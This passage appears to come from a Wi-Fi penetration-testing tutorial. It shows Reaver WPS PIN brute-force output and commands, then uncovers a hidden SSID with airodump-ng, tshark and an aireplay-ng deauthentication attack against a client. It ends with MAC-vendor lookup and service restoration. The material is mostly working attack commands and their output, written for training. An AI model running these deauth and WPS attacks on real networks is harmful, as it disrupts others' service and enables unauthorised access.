[+] Received beacon from 00:22:75:E2:8C:2A
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request
```
```bash
[root@wireless ~]# reaver -i wlan0mon -b 00:22:75:E2:8C:2A -p 19806716 -vv
```
## How to discover hidden SSID
```bash
[root@wireless ~]# airodump-ng wlan0mon
CH 7 ][ Elapsed: 12 s ][ 2022-10-11 22:42
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -40 7 0 0 6 54e WPA2 CCMP PSK <length: 10>
62:AF:97:C2:4E:24 -34 7 0 0 6 130 WPA2 CCMP PSK ARTEMIS
5E:AF:97:C2:4E:24 -33 7 0 0 6 130 WPA2 CCMP PSK NARUTO
5A:AF:97:C2:4E:24 -34 9 0 0 6 130 WPA2 CCMP PSK TOTORO
54:AF:97:C2:4E:24 -33 9 0 0 6 130 WPA2 CCMP PSK YOSHI
```
The hidden network's ESSID shows as `<length: 10>`: its beacons carry a 10-byte SSID field filled with zeros instead of the name. Capture packets on that channel and BSSID to confirm this:
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w hidden-ssid wlan0mon
CH 6 ][ Elapsed: 24 s ][ 2022-10-11 22:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -43 100 265 0 0 6 54e WPA2 CCMP PSK <length: 10>
BSSID STATION PWR Rate Lost Frames Notes Probes
```
```bash
[root@wireless ~]# tshark -r hidden-ssid-01.cap "wlan.ta == 00:18:39:E4:61:28"
Running as user "root" and group "root". This could be dangerous.
2 0.055007 Cisco-Li_e4:61:28 → Broadcast 802.11 138 Beacon frame, SN=3347, FN=0, Flags=........, BI=100, SSID=\000\000\000\000\000\000\000\000\000\000
```
Open Wireshark on the capture and apply the display filter `wlan.ta == 00:18:39:E4:61:28`:
![](https://i.imgur.com/MSYPLeg.png)
```bash
[root@wireless ~]# aireplay-ng -0 10 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon
23:04:51 Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:04:52 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:52 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [118|118 ACKs]
23:04:53 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:53 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:54 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [116|116 ACKs]
23:04:55 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:55 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [114|114 ACKs]
23:04:56 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [94|94 ACKs]
23:04:56 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [143|143 ACKs]
23:04:57 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [111|111 ACKs]
```
```bash
CH 6 ][ Elapsed: 6 s ][ 2022-10-11 23:38 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -45 100 68 28 6 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
00:18:39:E4:61:28 16:41:DA:4E:36:EA -43 1e- 1e 177 129 EAPOL OPENSOURCE
```
## MAC Address Vendors
You can use the following link to identify the MAC address vendor:
https://macvendors.com/
Or use the following command on Kali:
```bash!
[root@wireless ~]# grep -i <FIRST 6 CHARS OF MAC ADDRESS> /var/lib/ieee-data/oui.txt
```
## Restore the services
```bash!
[root@wireless ~]# systemctl start NetworkManager.service
[root@wireless ~]# systemctl start wpa_supplicant.service
```
## References
- https://www.aircrack-ng.org/
- https://www.youtube.com/watch?v=knllpZF508k
- https://www.youtube.com/watch?v=_OyJ62fP648
- https://www.yeahhub.com/bypass-hidden-ssid-wireless-network-full-proof-method/